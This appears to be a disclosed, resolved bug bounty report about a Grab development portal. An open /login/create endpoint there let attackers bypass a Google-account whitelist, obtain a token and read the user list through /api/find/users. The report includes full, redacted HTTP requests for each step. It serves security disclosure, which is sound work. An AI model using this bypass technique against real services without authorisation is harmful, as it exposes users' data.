Loading HuntDB...

Registration enabled on ███grab.com

Medium
G
Grab
Submitted None

Team Summary

Official summary from Grab

The researcher has identified an under development portal which had login restricted only to whitelisted Google accounts. They then discovered an endpoint which allowed creation of new user accounts, thus bypassing the login restriction and allowing them to access an API call that was leaking a list of users that were allowed to access the portal. We're thankful to @grouptherapy for this fine bug and short yet easy to reproduce bug report.

Reported by grouptherapy

Vulnerability Details

Technical details and impact analysis

Information Disclosure
**Summary:** An attacker can register an account on the `█████████grab.com` service, and access information from the service **Description:** While logging in via Google accounts is prohibited, an attacker can register an account through the `/login/create` endpoint, as per the below request ``` POST /login/create HTTP/1.1 Host: █████grab.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://███grab.com/ Authorization: Bearer null Content-Type: application/json Content-Length: 61 Cookie: G_ENABLED_IDPS=google; G_AUTHUSER_H=0 Connection: close {"userid":"█████","password":"██████"} ``` This can then be used to log in via the `/login` endpoint ,as in the following request: ``` POST /login HTTP/1.1 Host: █████grab.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://█████grab.com/ Authorization: Bearer null Content-Type: application/json Content-Length: 61 Cookie: G_ENABLED_IDPS=google; G_AUTHUSER_H=0 Connection: close {"userid":"██████","password":"████"} ``` which returns a valid token. F265433 This token can be used to access some of the endpoints, such as `/api/find/users`, as in the following request: F265434 ## Impact An attacker can access information in the system such as registered users. The application appears to be newly developed, and as such little information is stored currently.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Information Disclosure